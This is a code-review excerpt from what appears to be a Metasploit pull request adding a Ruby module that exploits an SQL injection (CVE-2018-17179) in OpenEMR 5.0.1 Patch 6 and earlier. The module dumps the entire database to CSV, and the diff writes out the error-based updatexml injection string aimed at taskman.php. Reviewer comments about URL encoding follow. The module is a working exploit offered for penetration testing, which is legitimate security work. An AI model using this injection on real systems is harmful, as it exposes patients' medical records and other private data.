modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb

```diff
@@ -0,0 +1,235 @@
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump',
+                      'Description' => '
+                        This module exploits a SQLi vulnerability found in
+                        OpenEMR version 5.0.1 Patch 6 and lower. The
+                        vulnerability allows the contents of the entire
+                        database (with exception of log and task tables) to be
+                        extracted.
+                        This module saves each table as a \'.csv\' file in your
+                        loot directory and has been tested with
+                        OpenEMR 5.0.1 (3).
+                      ',
+                      'License' => MSF_LICENSE,
+                      'Author' =>
+                        [
+                          'Will Porter <will.porter[at]lodestonesecurity.com>'
+                        ],
+                      'References' => [
+                        ['CVE', '2018-17179'],
+                        ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
+                      ],
+                      'Platform' => ['php'],
+                      'Arch' => ARCH_PHP,
+                      'Targets' =>
+                        [
+                          ['OpenEMR < 5.0.1 (6)', {}]
+                        ],
+                      'Privileged' => false,
+                      'DisclosureDate' => 'May 17 2019',
+                      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the OpenEMR installation', '/openemr'])
+      ]
+    )
+  end
+
+  def uri
+    target_uri.path
+  end
+
+  def openemr_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri, 'admin.php')
+    )
+    vprint_status("admin.php response code: #{res.code}")
+    document = Nokogiri::HTML(res.body)
+    document.css('tr')[1].css('td')[3].text
+  rescue StandardError
+    ''
+  end
+
+  def check
+    # Check version
+    print_status('Trying to detect installed version')
+    version = openemr_version
+    return Exploit::CheckCode::Unknown if version.empty?
+
+    vprint_status("Version #{version} detected")
+    version.sub! ' (', '.'
+    version.sub! ')', ''
+    version.strip!
+
+    return Exploit::CheckCode::Safe unless Gem::Version.new(version) < Gem::Version.new('5.0.1.7')
+
+    Exploit::CheckCode::Appears
+  end
+
+  def get_response(payload)
+    path = "#{uri}/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' and updatexml(1,concat(0x7e, (#{payload})),0) or '"
+    # This is only going to work for spaces.  Ideally we could use URI.encode
+    # but that is deprecated and CGI.escape uses + which doesn't work
+    # for this application.
+    path = path.gsub ' ', '%20'
```

Comment:
Ideally this should use `vars_get` key for `send_request_cgi`, which I think should take care of the encoding issues too.

Reply:
This is addressed in the latest commit, and the `vars_get` attribute did take care of the encoding issues.

Reply:
Presumably this comment is no longer relevant and can be removed:

```ruby
    # This is only going to work for spaces.  Ideally we could use URI.encode
    # but that is deprecated and CGI.escape uses + which doesn't work
    # for this application.
```